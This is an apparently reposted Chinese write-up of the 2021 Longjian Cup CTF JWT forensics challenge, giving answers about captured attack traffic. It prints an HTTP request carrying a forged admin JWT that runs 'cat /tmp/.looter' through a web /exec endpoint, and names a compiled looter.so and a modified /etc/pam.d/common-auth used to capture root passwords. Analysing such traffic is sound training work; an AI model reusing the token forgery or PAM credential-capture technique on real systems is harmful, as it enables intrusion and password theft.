2021陇剑杯网络安全大赛-JWT

Posted 夜白君

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2021陇剑杯网络安全大赛-JWT相关的知识,希望对你有一定的参考价值。

2021陇剑杯网络安全大赛-JWT

题目描述:
昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:

解题思路:

2.1该网站使用了___jwt___认证方式。(如有字母请全部使用小写)

2.2黑客绕过验证使用的jwt中,id和username是_10087#admin_。(中间使用#号隔开,例如1#admin)

POST /exec HTTP/1.1
Host: 192.168.2.197:8081
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.197:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.197:8081/exec
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phpSESSID=3f8coeg6hm9vf0h5lcoifmk8o5; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MTAwODcsIk1hcENsYWltcyI6eyJ1c2VybmFtZSI6ImFkbWluIn19.rurQD5RYgMrFZow8r-k7KCP13P32sF-RpTXhKsxzvD0
Connection: close

command=cat%20/tmp/.looterHTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 07 Aug 2021 05:25:45 GMT
Content-Length: 453
Connection: close

Title

alert(“Username root\\nPassword: flag{test_flag}\\nUsername root\\nPassword: flag{test_flag}\\nUsername root\\nPassword: flag{test_flag}\\nUsername root\\nPassword: flag{test_flag}\\nUsername root\\nPassword: flag{test_flag}\\n”)

window.location.href="/exec";

id值jwt 解密

2.3黑客获取webshell之后,权限是___root___?

2.4黑客上传的恶意文件文件名是__1.c__。(请提交带有文件后缀的文件名,例如x.txt)

2.5黑客在服务器上编译的恶意so文件,文件名是__looter.so__。(请提交带有文件后缀的文件名,例如x.so)

2.6黑客在服务器上修改了一个配置文件,文件的绝对路径为__/etc/pam.d/common-auth__。(请确认绝对路径后再提交)

以上是关于2021陇剑杯网络安全大赛-JWT的主要内容,如果未能解决你的问题,请参考以下文章

2021陇剑杯网络安全大赛-iOS

2021陇剑杯网络安全大赛-SQL注入

2021陇剑杯网络安全大赛wp-SQL注入(详细题解)

2021陇剑杯网络安全大赛wp-webshell部分(详细题解)

2021陇剑杯网络安全大赛wp-IOS部分(详细题解)

首届“陇剑杯”网络安全大赛线上赛圆满结束